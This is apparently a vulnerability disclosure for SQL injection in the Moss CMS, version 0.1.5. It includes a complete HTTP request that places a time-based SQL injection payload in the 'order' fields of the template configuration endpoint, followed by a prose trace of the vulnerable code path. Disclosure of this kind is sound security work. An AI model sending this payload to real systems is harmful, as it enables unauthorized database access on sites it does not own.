Moss has SQL injection vulnerability #15
Description
Summary
Moss v0.1.5 version has an SQL injection vulnerability that allows attackers to inject carefully designed payloads into the order parameter to inject malicious SQL statements.
Injection point routing:
/admin/api/config/template
Fields with injection vulnerabilities:
The order field of index_list, global_list, category_page_list and tag_cloud
Details
POST /admin/api/config/template HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
token: xxx
Content-Length: 818
Origin: http://10.4.58.197:6515
Connection: keep-alive
Cookie: xxx
{"head":"11","footer":"©2023 Powered by <a href=\"https://github.com/deep-project/moss\"><strong>Moss</strong></a>","robots_txt":"User-agent: *\nDisallow:","ads_txt":"","logo":"data:image/png;base64,UEsFBgAAAAAAAAAAAAAAAAAAAAAAAA==","favicon_ico":"data:image/png;base64,UEsFBgAAAAAAAAAAAAAAAAAAAAAAAA==","carousel":[],"enable_carousel":false,"menu":{"select":[1],"limit":40,"order":""},"index_list":{"limit":10,"order":"if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(4)))test))","category_ids":[
1],"max_page":0,"disable_count":false},"global_list":{"limit":20,"order":"if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(4)))test))","category_ids":[1,2],"max_page":0,"disable_count":false},"category_page_list":{"limit":20,"order":"if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(4)))test))","category_ids":[1,2],"max_page":0,"disable_count":false},"tag_page_list":{"limit":20,"order":"","category_ids":null,"max_page":0,"disable_count":false},"tag_cloud":{"limit":15,"order":"if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(4)))test))","select":[]}}
There is a sorting option in the template configuration of the system backend. By modifying the sorting statement to a malicious injection statement, it leads to the concatenation execution when loading the template file, resulting in sql injection
First, update the template configuration and inject the sql statement
Visit the homepage of the website again to trigger data loading and execute the sql statement:
Error injection can also be performed. The execution results can be viewed in the log function of the system background:
Code
Receive a POST request /admin/API/config/template routing is as follows:
Follow up on the Controller.configupdate controller
Follow up on the config.Config.Save() method
Follow up on the service.Save() method. Here, repository.save () is used to store the configuration in the database. When the operation is successful, the Merge method () is used to update the current template configuration. It can be seen that no filtering or verification operations were performed on the configured data during the process.
When visiting the home page, the system will perform template rendering and execute methods such as Widget.IndexList() and Widget.GlobalList() in the template file to load the data.
The codes of these two methods are as follows. Both will call the 'simpleList()' method. Can see simpleList method of parameter configuration structure, to generate the context is called directly when the template configuration of Order fields, and then through Article. ListByCategoryIds () or Aricle. List () methods for database queries.
Follow up on the Article.List method:
The vulnerability trigger point is in the file: \main\domain\core\repository\article.go
